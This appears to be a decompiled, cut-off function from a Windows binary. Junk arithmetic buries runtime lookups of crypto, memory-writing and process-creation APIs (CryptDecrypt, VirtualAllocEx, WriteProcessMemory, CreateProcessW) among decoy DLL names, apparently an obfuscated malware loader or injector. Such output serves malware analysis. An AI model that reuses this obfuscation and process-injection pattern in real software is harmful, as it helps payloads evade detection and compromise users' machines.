E004EE96C(void* __ebx, void* __edi, void* __esi) {
char _v8;
signed int _v12;
signed int _v16;
signed int _v20;
signed int _v24;
signed int _v28;
signed int _v32;
struct HINSTANCE__* _v36;
intOrPtr _v40;
intOrPtr _v44;
char _v48;
intOrPtr _v52;
signed int _v56;
intOrPtr _v60;
signed int _t562;
signed int _t567;
void* _t570;
void* _t577;
signed int _t580;
signed int _t582;
signed int _t585;
signed int _t587;
void* _t589;
signed int _t605;
signed int _t607;
signed int _t609;
void* _t614;
signed int _t616;
signed int _t619;
signed int _t621;
void* _t623;
signed int _t627;
signed int _t628;
signed int _t629;
void* _t631;
signed int _t634;
signed int _t641;
signed int _t643;
intOrPtr _t644;
void* _t645;
signed int _t647;
void* _t656;
signed int _t658;
signed int _t659;
void* _t662;
void* _t664;
void* _t665;
signed int _t666;
void* _t668;
signed int _t669;
signed int _t670;
signed int _t672;
signed int _t676;
signed int _t678;
signed int _t679;
signed int _t682;
void* _t686;
signed int _t696;
void* _t698;
signed int _t700;
signed int _t703;
void* _t710;
void* _t713;
signed int _t715;
signed int _t724;
signed int _t726;
signed int _t728;
void* _t729;
signed int _t733;
signed int _t736;
signed int _t737;
void* _t738;
signed int _t739;
signed int _t744;
signed int _t745;
signed int _t748;
signed int _t750;
signed int _t752;
signed int _t758;
signed int _t759;
signed int _t761;
signed int _t762;
signed int _t763;
signed int _t765;
signed int _t766;
signed int _t772;
void* _t774;
void* _t776;
signed int _t777;
signed int _t778;
intOrPtr _t780;
signed int _t781;
void* _t782;
void* _t783;
signed int _t785;
void* _t791;
signed int _t793;
signed int _t794;
signed int _t797;
signed int _t801;
signed int _t802;
signed int _t804;
void* _t809;
void* _t811;
signed int _t814;
signed int _t830;
signed int _t834;
signed int _t836;
signed int _t838;
void* _t842;
signed int _t847;
signed int _t850;
signed int _t852;
signed int _t859;
void* _t865;
signed int _t876;
signed int _t878;
void* _t880;
signed int _t885;
signed int _t887;
void* _t896;
signed int _t898;
signed int _t901;
void* _t908;
void* _t910;
void* _t918;
signed int _t920;
void* _t927;
signed int _t928;
signed int _t930;
signed int _t931;
void* _t933;
signed int _t935;
void* _t936;
signed int _t939;
void* _t944;
signed int _t945;
signed int _t946;
signed int _t951;
signed int _t952;
void* _t953;
void* _t954;
signed int _t955;
signed int _t958;
signed int _t966;
signed int _t968;
void* _t972;
signed int _t983;
signed int _t984;
signed int _t990;
signed int _t993;
signed int _t995;
signed int _t996;
signed int _t998;
signed int _t1009;
void* _t1013;
signed int _t1015;
signed int _t1019;
signed int _t1023;
void* _t1024;
void* _t1026;
signed int _t1028;
signed int _t1035;
signed int _t1036;
signed int _t1037;
signed int _t1038;
signed int _t1046;
signed int _t1048;
signed int _t1050;
signed int _t1051;
signed int _t1052;
signed int _t1053;
signed int _t1054;
signed int _t1056;
signed int _t1066;
signed int _t1067;
void* _t1068;
signed int _t1074;
void* _t1077;
signed int _t1079;
signed int _t1080;
void* _t1081;
void* _t1087;
signed int _t1095;
signed int _t1099;
signed int _t1101;
struct HINSTANCE__* _t1102;
signed int _t1107;
void* _t1109;
signed int _t1111;
signed int _t1112;
signed int _t1113;
signed int _t1116;
void* _t1117;
void* _t1119;
signed int _t1123;
signed int _t1131;
void* _t1133;
signed int _t1138;
signed int _t1145;
void* _t1147;
signed int _t1152;
signed int _t1155;
void* _t1157;
signed int _t1162;
signed int _t1166;
signed int _t1168;
signed int _t1169;
signed int _t1171;
void* _t1172;
signed int _t1173;
signed int _t1174;
signed int _t1176;
intOrPtr _t1180;
void* _t1184;
signed int _t1187;
void* _t1189;
signed int _t1191;
signed int _t1192;
signed int _t1193;
signed int _t1195;
signed int _t1197;
signed int _t1198;
signed int _t1199;
void* _t1201;
signed int _t1203;
void* _t1207;
signed int _t1208;
signed int _t1215;
signed int _t1217;
signed int _t1221;
signed int _t1227;
void* _t1229;
signed int _t1236;
signed int _t1239;
void* _t1241;
signed int _t1244;
signed int _t1249;
signed int _t1250;
signed int _t1254;
signed int _t1256;
signed int _t1258;
signed int _t1260;
signed int _t1261;
signed int _t1262;
void* _t1263;
signed int _t1264;
signed int _t1267;
signed int _t1272;
signed int _t1273;
signed int _t1275;
signed int _t1277;
signed int _t1278;
signed int _t1281;
signed int _t1285;
void* _t1298;
signed int _t1300;
signed int _t1302;
signed int _t1303;
signed int _t1306;
signed int _t1310;
void* _t1311;
signed int _t1318;
signed int _t1322;
signed int _t1324;
signed int _t1325;
signed int _t1331;
signed int _t1334;
signed int _t1341;
signed int _t1343;
signed int _t1346;
signed int _t1350;
signed int _t1352;
signed int _t1354;
signed int _t1355;
void* _t1356;
void* _t1361;
signed int _t1363;
signed int _t1364;
void* _t1365;
signed int _t1366;
signed int _t1370;
signed int _t1371;
signed int _t1372;
signed int _t1373;
signed int _t1376;
signed int _t1378;
signed int _t1380;
signed int _t1381;
signed int _t1383;
signed int _t1387;
void* _t1388;
signed int _t1390;
signed int _t1401;
signed int _t1405;
void* _t1409;
void* _t1411;
signed int _t1413;
void* _t1417;
signed int _t1427;
signed int _t1429;
signed int _t1434;
signed int _t1440;
intOrPtr _t1447;
intOrPtr _t1448;
signed int _t1449;
signed int _t1452;
void* _t1453;
void* _t1463;
signed int _t1465;
void* _t1466;
signed int _t1467;
signed int _t1478;
signed int _t1484;
signed int _t1485;
signed int _t1486;
intOrPtr _t1488;
void* _t1492;
signed int _t1493;
signed int _t1500;
signed int _t1502;
void* _t1505;
signed int _t1506;
signed int _t1510;
void* _t1516;
intOrPtr _t1535;
void* _t1539;
void* _t1540;
intOrPtr _t1541;
void* _t1549;
void* _t1555;
void* _t1556;
void* _t1559;
void* _t1562;
signed int _t1564;
void* _t1576;
void* _t1577;
void* _t1581;
void* _t1582;
void* _t1586;
void* _t1587;
void* _t1602;
void* _t1605;
void* _t1606;
void* _t1607;
void* _t1611;
void* _t1616;
void* _t1623;
void* _t1626;
void* _t1628;
void* _t1630;
void* _t1636;
void* _t1641;
void* _t1642;
void* _t1643;
void* _t1646;
void* _t1660;
void* _t1669;
_t1395 = __ebx;
_t1539 = _t1540;
_t1541 = _t1540 + 0xffffffc8;
_push(__ebx);
_v8 = 0;
_push(_t1539);
_push(0x4f07fa);
_push( *[fs:eax]);
*[fs:eax] = _t1541;
_push(_t1539);
_push(0x4f065b);
_push( *[fs:eax]);
*[fs:eax] = _t1541;
_v32 = 0;
if(_v32 >= 2) {
L4:
_t562 = E004FEF50; // 0xa3b3f6c0
*0x4feedc = _t562 * *0x4feeec;
E00407678(_v8, 0, 1, &_v8);
_t567 = *0x4feef0; // 0x44632301
if(_t567 - *0x4fef28 < 0x68) {
_t1381 = E004FEF0C; // 0xb52124bf
*0x4fef04 = _t1381 + *0x4feefc;
_t1383 = E004FEF10; // 0x1cb931c0
E004FEF10 = E0040489C(_t1383);
}
*0x4fef30 = E004FEED0 * 0xc2;
_t570 = E004FEED0; // 0xc3c34ef0
*0x4fef44 = _t570 + *0x4feed8;
_v36 = GetModuleHandleW(L"advapi32.dll");
_v16 = _v28 + _v32;
if(_v24 + _v20 != _v20) {
L10:
_t577 = E004FEED0; // 0xc3c34ef0
*0x4feefc = _t577 - *0x4feee0;
asm("fild dword [0x4feee8]");
E004FEF10 = E004048D8();
_t580 = *0x4feefc; // 0x4b08dcc7
E004FEF2C = _t580 + E004FEF20;
_t582 = *0x4fef30; // 0xa1d816
*0x4fef3c = _t582 + *0x4fef4c;
if(_v36 == 0) {
L192:
asm("fild dword [ebp-0xc]");
_v24 = E004048D8();
_t585 = *0x4feef4; // 0xb52124ca
*0x4fef44 = _t585 * E004FEF20;
_t587 = *0x4feef4; // 0xb52124ca
*0x4feecc = _t587 + 4;
_t589 = E004FEF0C; // 0xb52124bf
*0x4feee8 = _t589 + 0x3b;
if(_v28 - _v16 == _v16) {
asm("fild dword [0x4feeec]");
*0x4fef04 = E004048CC();
}
_pop(_t1447);
*[fs:eax] = _t1447;
_pop(_t1448);
*[fs:eax] = _t1448;
_push(E004F0801);
return E004069A8( &_v8);
} else {
*0x505900 = GetProcAddress(_v36, "CryptAcquireContextA");
_v20 = _v32 + 0x93;
_v24 = _v16 - 0x72;
*0x4fef3c = *0x4feee8 * 0x3c;
_t605 = E004FEF00; // 0xa3b3f6c0
*0x4fef4c = _t605 - 0x3a;
_t607 = *0x4feea0; // 0xa1d900
_t1449 = *0x4feef0; // 0x44632301
if(_t607 - *0x4feecc <= _t1449 - *0x4feecc) {
_t609 = *0x4feea0; // 0xa1d900
*0x4feee8 = _t609;
} else {
_t1370 = *0x4fef30; // 0xa1d816
E004FEED0 = _t1370;
}
*0x4fef04 = *0x4fef40 * 0x35;
*0x505904 = GetProcAddress(_v36, "CryptReleaseContext");
_v32 = 0;
if(_v32 < 9) {
_v32 = _v32 + 1;
_t1363 = *0x4fef4c; // 0x43c1493c
*0x4fef4c = _t1363;
_t1364 = E004FEF38; // 0xc3c34fdc
E004FEF50 = _t1364;
_t1365 = E004FEF50; // 0xa3b3f6c0
_t1555 = _t1365 - *0x4fef4c; // 0x43c1493c
if(_t1555 <= 0) {
_t1366 = *0x4feee8; // 0xdcd0f434
E004FEF0C = _t1366 + E004FEF50;
} else {
_v12 = _v24 + _v28;
}
}
_t614 = E004FEF2C; // 0xa1d900
*0x4fef4c = _t614 - *0x4feed8;
_t616 = *0x4fef28; // 0x3c79b5d4
_v60 = _t616 + 0xbd;
asm("fild dword [ebp-0x38]");
*0x4feed8 = E004048CC();
_t619 = E004FEF38; // 0xc3c34fdc
*0x4feef0 = _t619 * *0x4fef44;
_t621 = *0x4fef18; // 0xbc3e19a
_t1556 = _t621 - *0x4fef04 - *0x4feef4; // 0xb52124ca
if(_t1556 == 0) {
_t1361 = E004FEF00; // 0xa3b3f6c0
E004FEF00 = E0040489C(_t1361);
}
_t623 = E004FEF20; // 0x6e687a1a
E004FEF10 = _t623;
*0x505908 = GetProcAddress(_v36, "CryptDestroyKey");
_v32 = 0;
do {
_t627 = *0x4fef44; // 0x38993
*0x4feea0 = _t627;
_v32 = _v32 + 1;
} while (_v32 != 4);
_t628 = *0x4feefc; // 0x4b08dcc7
E004FEED0 = _t628;
_t629 = *0x4feed8; // 0x1cb9338e
*0x4feed8 = E0040489C(_t629);
_t631 = E004FEED0; // 0xc3c34ef0
_t1559 = _t631 - *0x4feed8; // 0x1cb9338e
if(_t1559 > 0) {
_v16 = _v28 * 0xb2;
E00406CF4( &_v8, L"NlsData0020.dll");
}
if(0xb7 - *0x4fef40 < 0x8c) {
_t1350 = *0x4feed8; // 0x1cb9338e
*0x4fef30 = _t1350 + *0x4feeec;
_t1352 = E004FEF34; // 0xc3c34ef0
_t1562 = _t1352 - *0x4fef48 - E004FEF34; // 0xc3c34ef0
if(_t1562 < 0) {
_t1356 = E004FEF20; // 0x6e687a1a
E004FEF50 = _t1356 - 0x44;
}
_t1354 = E004FEF00; // 0xa3b3f6c0
_t1355 = _t1354 * *0x4fef30;
_t1564 = _t1355;
*0x4feee0 = _t1355;
}
_t634 = *0x4fef44; // 0x38993
*0x4feef0 = _t634;
_push(_v12);
_t1401 = *0x4feef0; // 0x44632301
_t1452 = *0x4feef0; // 0x44632301
*0x4feefc = E004EE798(_v28, _t1395, _t1401, _t1452, _t1564);
*0x50590c = GetProcAddress(_v36, "CryptImportKey");
_v32 = 0;
if(_v32 >= 0xd) {
L36:
_t641 = *0x4feea0; // 0xa1d900
*0x4fef48 = _t641;
asm("fild dword [0x4feee0]");
E004FEED0 = E004048CC();
_t643 = *0x4fef40; // 0x3c79b5d4
*0x4feedc = _t643;
_t644 = *0x4feee4; // 0x0
_v44 = _t644;
if(_v44 != 0) {
_v44 = *((intOrPtr*)(_v44 - 4));
}
if(_v44 > 0xfe) {
*0x4feefc = *0x4fef28 * 0x91;
}
_t645 = E004FEF0C; // 0xb52124bf
_t1576 = _t645 - *0x4feef0 - E004FEF0C; // 0xb52124bf
if(_t1576 >= 0) {
_t647 = *0x4fef30; // 0xa1d816
__eflags = _t647 + E004FEF38 - E004FEF38; // 0xc3c34fdc
if(__eflags != 0) {
_push(_v12);
_t1453 = E004FEF34; // 0xc3c34ef0
E004EE798(_v16, _t1395, _v16, _t1453, __eflags);
} else {
_t1331 = *0x4feecc; // 0xd26bafe0
_v60 = _t1331 + 4;
asm("fild dword [ebp-0x38]");
*0x4feea0 = E004048D8();
}
} else {
_t1334 = *0x4feef0; // 0x44632301
E004FEF20 = _t1334 + 4;
}
*0x505910 = GetProcAddress(_v36, "CryptDecrypt");
*0x505974 = GetProcAddress(_v36, "CryptCreateHash");
_t656 = E004FEF50; // 0xa3b3f6c0
E004FEF50 = E0040489C(_t656);
_t658 = *0x4fef04; // 0x43c14963
*0x4feecc = _t658;
_t659 = *0x4feecc; // 0xd26bafe0
_t1577 = _t659 - E004FEF50; // 0xa3b3f6c0
if(_t1577 > 0) {
_t1324 = *0x4fef4c; // 0x43c1493c
*0x4feedc = _t1324;
_t1325 = *0x4feee0; // 0x747938b
*0x4feee0 = E0040489C(_t1325);
_v16 = _v24 * _v20;
_v12 = _v28 * _v32;
}
if(_v20 + _v16 < _v12 + _v20) {
_t1322 = *0x4feee8; // 0xdcd0f434
*0x4fef28 = _t1322 * *0x4feee0;
}
_t662 = E004FEF34; // 0xc3c34ef0
E004FEF34 = E0040489C(_t662);
_t664 = E004FEF34; // 0xc3c34ef0
_t1581 = _t664 - *0x4feee0; // 0x747938b
if(_t1581 >= 0) {
_t665 = E004FEED0; // 0xc3c34ef0
E004FEF20 = _t665;
_t666 = *0x4feeec; // 0xb52124f2
E004FEF34 = _t666 + 0xa2;
_t668 = E004FEF00; // 0xa3b3f6c0
_t669 = _t668 - 0xa0;
__eflags = _t669;
*0x4fef48 = _t669;
} else {
E00407640(_v8, L"SetLocaleInfoA");
if(_t1581 != 0) {
_t1318 = *0x4feef0; // 0x44632301
*0x4feefc = _t1318 + *0x4feecc;
} else {
E00406CF4( &_v8, L"spwizeng.dll");
}
}
_t670 = *0x4fef40; // 0x3c79b5d4
*0x4feee0 = _t670 + 4;
_t672 = *0x4feea0; // 0xa1d900
*0x4feef4 = _t672 - 0x35;
*0x505978 = GetProcAddress(_v36, "CryptHashData");
_t676 = *0x4fef04; // 0x43c14963
_t1582 = _t676 + E004FEF38 - E004FEF38; // 0xc3c34fdc
if(_t1582 != 0) {
_t678 = _v20 * 0x9b;
__eflags = _t678;
_v16 = _t678;
} else {
_v32 = 0;
if(_v32 >= 4) {
L59:
_t679 = *0x4fef44; // 0x38993
_v60 = _t679 + 4;
asm("fild dword [ebp-0x38]");
E004FEF0C = E004048D8();
_t682 = *0x4fef14; // 0xb52124ca
*0x4fef14 = _t682;
E00407678(_v8, 0, 1, &_v8);
_t686 = E004FEF10; // 0x1cb931c0
E004FEF34 = _t686 + E004FEF2C;
if(_v28 - _v20 < _v28) {
_t1310 = *0x4feedc; // 0xbc3e19a
_t1311 = _t1310 + 0xf1;
_t1586 = _t1311;
E004FEF50 = _t1311;
}
*0x50597c = GetProcAddress(_v36, "CryptGetHashParam");
_v20 = _v28 + 4;
_v32 = _v12 + 0x4d;
_t696 = *0x4feee8; // 0xdcd0f434
*0x4fef30 = _t696 + 0x1d;
_t698 = E004FEF00; // 0xa3b3f6c0
*0x4fef40 = _t698 + 4;
_t700 = *0x4fef18; // 0xbc3e19a
_push(_t700);
*0x4fef44 = E004EE798(_v28, _t1395, _v16, _v28, _t1586);
_t703 = *0x4fef14; // 0xb52124ca
*0x4feea0 = _t703;
*0x505980 = GetProcAddress(_v36, "CryptDestroyHash");
_v20 = _v24 + 0x90;
_v16 = _v28 * _v32;
_t710 = E004FEF10; // 0x1cb931c0
E004FEF10 = E0040489C(_t710);
asm("fild dword [0x4fef4c]");
E004FEF2C = E004048CC();
_t713 = E004FEED0; // 0xc3c34ef0
*0x4fef40 = _t713 + *0x4fef18;
_t715 = *0x4feeec; // 0xb52124f2
E004FEF50 = _t715 - *0x4feeec;
*0x505968 = GetProcAddress(_v36, "GetCurrentHwProfileW");
_v36 = GetModuleHandleW(L"kernel32.dll");
_v20 = _v28 * _v24;
_v12 = _v16 + _v32;
_t724 = E004FEF50; // 0xa3b3f6c0
E004FEF38 = _t724 * *0x4fef3c;
_t726 = *0x4feef4; // 0xb52124ca
*0x4fef44 = _t726 * *0x4feedc;
_t728 = E004FEF50; // 0xa3b3f6c0
*0x4fef4c = _t728;
_t729 = E004FEF50; // 0xa3b3f6c0
_t1587 = _t729 + 0xd - *0x4fef3c; // 0x1cb932a9
if(_t1587 < 0) {
E00406CF4( &_v8, L"EtwEventWriteStartScenario");
}
if(_v36 == 0) {
L189:
_v16 = _v32 + _v20;
_t733 = *0x4fef28; // 0x3c79b5d4
_v60 = _t733 + 0x17;
asm("fild dword [ebp-0x38]");
*0x4fef30 = E004048CC();
_t736 = *0x4feef0; // 0x44632301
E004FEF38 = _t736;
_t737 = *0x4feed8; // 0x1cb9338e
*0x4fef3c = _t737;
_t738 = E004FEF38; // 0xc3c34fdc
_t1669 = _t738 - *0x4fef3c; // 0x1cb932a9
if(_t1669 < 0) {
*0x4feecc = 0x7a - E004FEF38;
}
_t739 = E004FEF00; // 0xa3b3f6c0
*0x4feef0 = _t739 * E004FEF0C;
goto L192;
} else {
_v24 = _v28;
_t744 = *0x4feefc; // 0x4b08dcc7
*0x4fef3c = _t744;
_t745 = *0x4fef14; // 0xb52124ca
_v60 = _t745 + 0x95;
asm("fild dword [ebp-0x38]");
*0x4fef4c = E004048CC();
_t748 = *0x4feea0; // 0xa1d900
_t1463 = E004FEF0C; // 0xb52124bf
_t1589 = _t748 + *0x4feee0 - _t1463 + *0x4feea0;
if(_t748 + *0x4feee0 < _t1463 + *0x4feea0) {
_push(_v28);
_t1306 = *0x4fef14; // 0xb52124ca
*0x4feee0 = E004EE798(_t1306, _t1395, _v24, _v12, _t1589);
}
_t750 = *0x4feeec; // 0xb52124f2
*0x4feeec = E0040489C(_t750);
_t752 = *0x4feed8; // 0x1cb9338e
_v60 = _t752 + 0x2a;
asm("fild dword [ebp-0x38]");
E004FEF00 = E004048CC();
*0x505948 = GetProcAddress(_v36, "VirtualAllocEx");
_v32 = 0;
if(_v32 >= 0xc) {
L71:
_t758 = *0x4feefc; // 0x4b08dcc7
_push(_t758);
_t1405 = *0x4fef3c; // 0x1cb932a9
_t1465 = *0x4feed8; // 0x1cb9338e
_t759 = *0x4fef14; // 0xb52124ca
*0x4feef4 = E004EE798(_t759, _t1395, _t1405, _t1465, _t1592);
_t761 = *0x4fef4c; // 0x43c1493c
*0x4fef48 = _t761;
_t762 = E004FEF38; // 0xc3c34fdc
*0x4fef4c = _t762;
_t763 = *0x4feed8; // 0x1cb9338e
*0x4feecc = _t763 + 0x4c;
_t765 = *0x4fef30; // 0xa1d816
_push(_t765);
_t1466 = E004FEF38; // 0xc3c34fdc
_t766 = *0x4feee0; // 0x747938b
*0x4fef48 = E004EE798(_t766, _t1395, _v16, _t1466, _t1592);
*0x50594c = GetProcAddress(_v36, "WriteProcessMemory");
*0x50591c = GetProcAddress(_v36, "VirtualAlloc");
_t772 = *0x4fef30; // 0xa1d816
_t1467 = *0x4fef40; // 0x3c79b5d4
if(_t772 + *0x4fef14 >= _t1467 + *0x4fef30) {
_t774 = E004FEF34; // 0xc3c34ef0
__eflags = _t774 - *0x4fef30 - E004FEF34; // 0xc3c34ef0
if(__eflags < 0) {
_t1272 = *0x4feeec; // 0xb52124f2
_t1273 = _t1272 - *0x4fef04;
__eflags = _t1273;
E004FEF50 = _t1273;
}
_t776 = E004FEF34; // 0xc3c34ef0
E004FEED0 = _t776;
_t777 = *0x4fef48 * 0x91;
__eflags = _t777;
*0x4feee8 = _t777;
_t778 = *0x4feef4; // 0xb52124ca
*0x4feef4 = E0040489C(_t778);
L83:
_t780 = *0x4feee4; // 0x0
_v52 = _t780;
if(_v52 != 0) {
_v52 = *((intOrPtr*)(_v52 - 4));
}
if(_v52 == 0x3f) {
_t1260 = *0x4fef40; // 0x3c79b5d4
E004FEF20 = _t1260;
_t1261 = *0x4fef14; // 0xb52124ca
E004FEF2C = _t1261;
_t1262 = *0x4feee0; // 0x747938b
E004FEF34 = _t1262;
_t1263 = E004FEF34; // 0xc3c34ef0
_t1602 = _t1263 - E004FEF2C; // 0xa1d900
if(_t1602 < 0) {
_t1267 = *0x4fef3c; // 0x1cb932a9
E004FEF50 = _t1267 + *0x4feefc;
}
_t1264 = *0x4fef28; // 0x3c79b5d4
_v60 = _t1264 + 0xee;
asm("fild dword [ebp-0x38]");
*0x4feee0 = E004048CC();
}
_t781 = *0x4feed8; // 0x1cb9338e
*0x4fef04 = *0x4fef04 + _t781;
_t782 = E004FEED0; // 0xc3c34ef0
E004FEF10 = _t782;
_t783 = E004FEF10; // 0x1cb931c0
_t1605 = _t783 - E004FEF2C; // 0xa1d900
if(_t1605 >= 0) {
asm("fild dword [0x4feee0]");
*0x4feea0 = E004048CC();
} else {
_t1258 = *0x4fef48; // 0xc3c34ef0
*0x4fef30 = _t1258 - 0x4f;
}
_t785 = *0x4feea0; // 0xa1d900
*0x4feeec = _t785 * *0x4feea0;
*0x4fef04 = 0x7b - E004FEF50;
*0x505920 = GetProcAddress(_v36, "VirtualFree");
_t791 = E004FEF50; // 0xa3b3f6c0
E004FEF50 = E0040489C(_t791);
_t793 = E004FEF34; // 0xc3c34ef0
*0x4feea0 = _t793;
_t794 = *0x4feea0; // 0xa1d900
_t1606 = _t794 - E004FEF50; // 0xa3b3f6c0
if(_t1606 <= 0) {
__eflags = 0xa6 - E004FEF38 - 0xd3;
if(0xa6 - E004FEF38 < 0xd3) {
_t1239 = *0x4feec4; // 0x0
_v56 = _t1239;
__eflags = _v56;
if(_v56 != 0) {
_t1244 = _v56 - 4;
__eflags = _t1244;
_v56 = *_t1244;
}
__eflags = _v56 - 0x32;
if(__eflags > 0) {
_push(_v32);
_t1434 = *0x4feefc; // 0x4b08dcc7
_t1516 = E004FEF0C; // 0xb52124bf
_t1241 = E004FEF10; // 0x1cb931c0
*0x4fef28 = E004EE798(_t1241, _t1395, _t1434, _t1516, __eflags);
}
}
} else {
_push(_v12);
E004EE798(_v16, _t1395, _v16, _v28, _t1606);
_t1249 = *0x4feefc; // 0x4b08dcc7
_push(_t1249);
_t1250 = *0x4feeec; // 0xb52124f2
E004EE798(_t1250, _t1395, _v24, _v24, _t1606);
_v16 = _v20 + 0xbb;
_t1254 = *0x4feea0; // 0xa1d900
*0x4fef14 = _t1254 + *0x4feea0;
_t1256 = *0x4feedc; // 0xbc3e19a
E004FEF2C = _t1256 - E004FEF34;
}
_t797 = *0x4feee8; // 0xdcd0f434
E004FEF20 = _t797 * *0x4fef28;
E00406CF4( &_v8, L"CNBJOP78.DLL");
_t801 = *0x4feefc; // 0x4b08dcc7
E004FEF34 = _t801;
_t802 = *0x4fef30; // 0xa1d816
*0x4fef44 = _t802 + *0x4fef30;
_t804 = *0x4feefc; // 0x4b08dcc7
*0x4fef4c = _t804;
*0x505924 = GetProcAddress(_v36, "VirtualProtect");
_v20 = _v24 + _v32;
_t809 = E004FEF10; // 0x1cb931c0
_t1607 = _t809 - *0x4fef14 - E004FEF10; // 0x1cb931c0
if(_t1607 < 0) {
E004FEF34 = *0x4fef48 * 0xbf;
}
_t811 = E004FEF34; // 0xc3c34ef0
E004FEF50 = _t811 + 0x89;
*0x4feee0 = *0x4fef14 * 0x54;
_t814 = *0x4fef14; // 0xb52124ca
E004FEF00 = _t814 * E004FEED0;
*0x505928 = GetProcAddress(_v36, "LoadLibraryA");
*0x50592c = GetProcAddress(_v36, "FreeLibrary");
*0x505930 = GetProcAddress(_v36, "HeapFree");
E00407678(_v8, 0, 1, &_v8);
E00406CF4( &_v8, L"ZwClearEvent");
_v12 = 0;
do {
_v16 = _v32 * _v20;
_v12 = _v12 + 1;
} while (_v12 != 7);
_t830 = *0x4feefc; // 0x4b08dcc7
_t1611 = _t830 + 0xe9 - *0x4feee8; // 0xdcd0f434
if(_t1611 >= 0) {
__eflags = _v28 - _v28 - _v28;
if(_v28 - _v28 >= _v28) {
_t834 = *0x4feedc; // 0xbc3e19a
*0x4feedc = E0040489C(_t834);
} else {
E004FEF50 = *0x4fef40 * 0xe;
}
} else {
_t1236 = *0x4fef44; // 0x38993
E004FEF20 = _t1236 + 0x45;
}
_t836 = *0x4feef0; // 0x44632301
E004FEF0C = _t836 + *0x4fef28;
_t838 = *0x4fef4c; // 0x43c1493c
*0x4fef14 = _t838;
*0x505934 = GetProcAddress(_v36, "GetProcessHeap");
_v32 = 0;
_t1612 = _v32 - 0xe;
if(_v32 < 0xe) {
_v32 = _v32 + 1;
E00407678(_v8, 0, 1, &_v8);
asm("fild dword [ebp-0x10]");
_v12 = E004048D8();
}
_t842 = E004FEF50; // 0xa3b3f6c0
*0x4fef04 = _t842 - 0x65;
E00407678(_v8, 0, 1, &_v8);
_t847 = *0x4fef3c; // 0x1cb932a9
_v60 = _t847 + 4;
asm("fild dword [ebp-0x38]");
*0x4fef28 = E004048D8();
_t850 = *0x4fef4c; // 0x43c1493c
*0x4fef3c = _t850 - *0x4feef4;
_t852 = E004FEED0; // 0xc3c34ef0
*0x4fef4c = _t852 * *0x4feecc;
*0x505938 = GetProcAddress(_v36, "GetNativeSystemInfo");
_v20 = _v32 + _v24;
_v28 = _v12 * 0xe3;
_t859 = *0x4feef0; // 0x44632301
*0x4feee8 = _t859 - 0x20;
*0x4feefc = *0x4fef04 * 0x1e;
_push(_v16);
_t1409 = E004FEF34; // 0xc3c34ef0
_t1478 = *0x4fef18; // 0xbc3e19a
*0x4feee0 = E004EE798(_v32, _t1395, _t1409, _t1478, _t1612);
_t865 = E004FEF34; // 0xc3c34ef0
E004FEF10 = _t865;
*0x50593c = GetProcAddress(_v36, "IsBadReadPtr");
*0x505940 = GetProcAddress(_v36, "GetProcAddress");
E00406CF4( &_v8, L"InvalidateRect");
_v12 = 0;
do {
_v60 = _v32 + 4;
asm("fild dword [ebp-0x38]");
_v16 = E004048D8();
_v12 = _v12 + 1;
} while (_v12 != 9);
_t876 = *0x4feef4; // 0xb52124ca
*0x4feef4 = _t876;
_v20 = 0;
if(_v20 < 2) {
_v20 = _v20 + 1;
_t1227 = *0x4feecc; // 0xd26bafe0
*0x4fef28 = _t1227 * *0x4fef28;
_t1229 = E004FEF20; // 0x6e687a1a
*0x4fef3c = _t1229 + 4;
}
_t878 = *0x4fef3c; // 0x1cb932a9
_t1616 = _t878 + E004FEF50 - E004FEF50; // 0xa3b3f6c0
if(_t1616 == 0) {
E00406CF4( &_v8, _v8);
}
_t880 = E004FEF00; // 0xa3b3f6c0
_v60 = _t880 + 4;
asm("fild dword [ebp-0x38]");
*0x4feee8 = E004048D8();
*0x505954 = GetProcAddress(_v36, "GetCurrentProcess");
_t885 = *0x4feea0; // 0xa1d900
E004FEF2C = _t885;
_v28 = 0;
if(_v28 >= 0xd) {
L122:
_t887 = *0x4fef30; // 0xa1d816
*0x4fef3c = _t887;
asm("fild dword [0x4fef40]");
E004FEF50 = E004048D8();
E00406CF4( &_v8, _v8);
*0x505950 = GetProcAddress(_v36, "ReadProcessMemory");
_v20 = _v32 - 0xa1;
_v24 = _v12 * 0xca;
_t896 = E004FEF38; // 0xc3c34fdc
E004FEF34 = _t896 - *0x4fef44;
_t898 = *0x4fef48; // 0xc3c34ef0
_v60 = _t898 + 4;
asm("fild dword [ebp-0x38]");
*0x4fef44 = E004048D8();
_t901 = *0x4fef18; // 0xbc3e19a
*0x4fef4c = _t901;
E00406CF4( &_v8, _v8);
*0x505970 = GetProcAddress(_v36, "GetWindowsDirectoryW");
asm("fild dword [ebp-0x14]");
_v16 = E004048D8();
_push(_v24);
_t908 = E004FEF34; // 0xc3c34ef0
*0x4fef48 = E004EE798(_t908, _t1395, _v24, _v20, _t1621);
_t910 = E004FEF10; // 0x1cb931c0
E004FEF10 = E0040489C(_t910);
_v60 = _v32 + 4;
asm("fild dword [ebp-0x38]");
_v28 = E004048D8();
if(_v24 + _v28 <= _v28) {
_push(_v28);
_t1411 = E004FEF50; // 0xa3b3f6c0
_t918 = E004FEF34; // 0xc3c34ef0
E004EE798(_t918, _t1395, _t1411, _v32, __eflags);
} else {
_t1215 = *0x4fef30; // 0xa1d816
_t1623 = _t1215 + 0xbb - E004FEF0C; // 0xb52124bf
if(_t1623 < 0) {
_t1217 = *0x4feed8; // 0x1cb9338e
*0x4fef4c = _t1217 * *0x4feee0;
}
}
_t920 = *0x4fef48; // 0xc3c34ef0
*0x4feefc = _t920 + *0x4fef28;
*0x50596c = GetProcAddress(_v36, "GetShortPathNameW");
*0x505984 = GetProcAddress(_v36, "CreateProcessW");
_v32 = 0;
do {
_t927 = E004FEF34; // 0xc3c34ef0
E004FEF2C = _t927;
_t928 = *0x4fef48; // 0xc3c34ef0
*0x4fef40 = _t928 + E004FEF2C;
_t930 = *0x4fef18; // 0xbc3e19a
*0x4fef48 = _t930;
_v32 = _v32 + 1;
} while (_v32 != 0xe);
_t931 = *0x4fef14; // 0xb52124ca
E004FEED0 = _t931 + 0x35;
_t933 = E004FEF10; // 0x1cb931c0
*0x4feef0 = _t933 + E004FEF0C;
_t935 = *0x4feef4; // 0xb52124ca
*0x4feef4 = _t935;
_t936 = E004FEF10; // 0x1cb931c0
_v60 = _t936 + 4;
asm("fild dword [ebp-0x38]");
E004FEF0C = E004048D8();
_t939 = *0x4fef14; // 0xb52124ca
*0x4fef14 = E0040489C(_t939);
*0x505988 = GetProcAddress(_v36, "GetTempPathW");
_v32 = 0;
_t944 = E004FEF38; // 0xc3c34fdc
E004FEF50 = _t944;
_t945 = E004FEF20; // 0x6e687a1a
*0x4feea0 = _t945;
_t946 = *0x4feea0; // 0xa1d900
